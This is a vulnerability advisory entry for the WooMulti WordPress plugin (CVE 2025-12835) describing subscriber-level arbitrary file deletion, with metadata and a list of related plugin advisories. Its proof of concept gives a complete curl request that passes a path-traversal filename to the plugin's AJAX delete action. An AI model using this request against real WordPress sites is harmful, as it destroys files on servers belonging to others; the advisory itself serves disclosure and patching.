WooMulti <= 1.7 – Subscriber+ Arbitrary File Deletion | CVE 2025-12835 | Plugin Vulnerabilities

Description

The plugin does not validate a file parameter when deleting files, which could allow any authenticated users, such as subscriber to delete arbitrary files on the server.

Proof of Concept

Add a test file (ex: `test.php` to the root WordPress directory).

With a subscriber cookie, run:

``` 
curl -i -X POST "http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: <<COOKIE_VALUE>>" \
  --data "action=gbwm_ajax&ajaxFunction=DeleteFile&filename=.../../../test.php"
```

See that `test.php` is deleted.

Affects Plugins

No known fix

References

CVE

Classification

Type

FILE DELETION

OWASP top 10

A6: Security Misconfiguration

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

1650ddac-04c7-47fa-b03e-bd0338243fcc

Timeline

Publicly Published

2025-11-11 (about 1 month ago)

Added

2025-11-11 (about 1 month ago)

Last Updated

2025-12-02 (about 30 days ago)

Other

Published

Title

Published

2025-06-10

Title

WP-DownloadManager < 1.68.11 - Admin+ Arbitrary File Deletion

Published

2025-11-20

Title

WP AUDIO GALLERY <= 2.0 - Authenticated (Subscriber+) Arbitrary File Deletion via 'audio_upload' Parameter

Published

2025-07-14

Title

Goza - Nonprofit Charity WordPress Theme < 3.2.3 - Missing Authorization to Unauthenticated Arbitrary File Deletion

Published

2025-04-18

Title

CLEVER - HTML5 Radio Player With History - Shoutcast and Icecast - Elementor Widget Addon < 2.5 - Unauthenticated Arbitrary File Read

Published

2025-01-29

Title

W2S – Migrate WooCommerce to Shopify < 1.3.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Read